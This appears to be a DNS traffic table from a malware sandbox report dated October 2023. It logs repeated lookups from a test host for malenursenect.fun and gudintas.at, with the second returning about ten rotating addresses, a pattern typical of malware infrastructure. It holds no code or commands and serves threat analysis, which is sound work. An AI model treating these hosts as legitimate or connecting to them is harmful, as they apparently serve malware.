                                                                                                        Oct 3, 2023 18:03:14.645804882 CEST8.8.8.8192.168.2.30x2dd0No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:15.232152939 CEST8.8.8.8192.168.2.30x6c7cNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:15.232152939 CEST8.8.8.8192.168.2.30x6c7cNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:15.808784962 CEST8.8.8.8192.168.2.30xf230No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:15.808784962 CEST8.8.8.8192.168.2.30xf230No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:16.377912045 CEST8.8.8.8192.168.2.30xf3a1No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:16.377912045 CEST8.8.8.8192.168.2.30xf3a1No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:16.930097103 CEST8.8.8.8192.168.2.30xc908No error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:16.930097103 CEST8.8.8.8192.168.2.30xc908No error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:17.485625982 CEST8.8.8.8192.168.2.30xde8cNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:17.485625982 CEST8.8.8.8192.168.2.30xde8cNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:18.030464888 CEST8.8.8.8192.168.2.30x790dNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:18.030464888 CEST8.8.8.8192.168.2.30x790dNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:18.892719030 CEST8.8.8.8192.168.2.30xb15cNo error (0)malenursenect.fun104.21.1.18A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:18.892719030 CEST8.8.8.8192.168.2.30xb15cNo error (0)malenursenect.fun172.67.151.219A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:03:57.874663115 CEST8.8.8.8192.168.2.30xe6beNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:01.964067936 CEST8.8.8.8192.168.2.30xe2eaNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:07.005943060 CEST8.8.8.8192.168.2.30x799fNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:11.446464062 CEST8.8.8.8192.168.2.30xaa93No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:15.948396921 CEST8.8.8.8192.168.2.30x5b40No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:20.879137039 CEST8.8.8.8192.168.2.30x4393No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:26.207958937 CEST8.8.8.8192.168.2.30x87dfNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:33.399437904 CEST8.8.8.8192.168.2.30xe990No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:37.172843933 CEST8.8.8.8192.168.2.30x7cbeNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:42.209999084 CEST8.8.8.8192.168.2.30xe399No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:46.413270950 CEST8.8.8.8192.168.2.30xf736No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:51.444950104 CEST8.8.8.8192.168.2.30xbaNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:04:56.390974998 CEST8.8.8.8192.168.2.30xf117No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:00.383392096 CEST8.8.8.8192.168.2.30xcf23No error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:04.006978035 CEST8.8.8.8192.168.2.30x86efNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at190.224.203.37A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at211.171.233.129A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at186.13.17.220A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:08.269222975 CEST8.8.8.8192.168.2.30x97aeNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at211.40.39.251A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at211.104.254.139A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at175.126.109.15A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at211.59.14.90A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at14.33.209.147A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at189.169.85.254A (IP address)IN (0x0001)false
                                                                                                        Oct 3, 2023 18:05:13.119014025 CEST8.8.8.8192.168.2.30x63bNo error (0)gudintas.at189.232.58.103A (IP address)IN (0x0001)false
